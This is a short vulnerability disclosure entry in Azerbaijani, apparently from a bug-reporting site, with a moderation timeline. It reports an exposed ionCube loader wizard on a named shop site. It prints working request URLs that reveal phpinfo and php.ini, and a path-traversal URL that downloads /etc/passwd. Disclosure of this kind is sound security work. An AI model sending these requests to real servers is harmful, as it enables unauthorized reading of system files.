Ətraflı məlumat
Bəd əməlli bir kəs, phpinfo() və php.ini qurğu faylı ilə tanış ola bilər. Bundan əlavə, web serverin ixtiyari fayllarını da əldə edə bilər.
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpinfo
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpconfig
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpconfig&ininame=../../../../../../../etc/passwd&download=1
Ətraflı məlumat: https://firefart.at/post/multiple-vulnerabilities-in-ioncube-loader-wizard/
Qeydlər
-
23 Yanvar 2017, 13:15
Boşluğun statusu
Mənbədən cavab gəlmədi -
15 Dekabr 2016, 11:46
Boşluğun statusu
Mənbəyə boşluq haqqında e-poçt göndərildi -
14 Dekabr 2016, 13:25
Boşluğa bal verildi
Moderator boşluq üçün 10 ballıq qiymətləndirmə sistemi üzrə 7 bal təyin etdi -
14 Dekabr 2016, 13:19
Boşluğun statusu
Moderator tərəfindən təsdiq edildi -
12 Dekabr 2016, 02:25
Boşluq əlavə edildi
Boşluq BUGemota əlavə edildi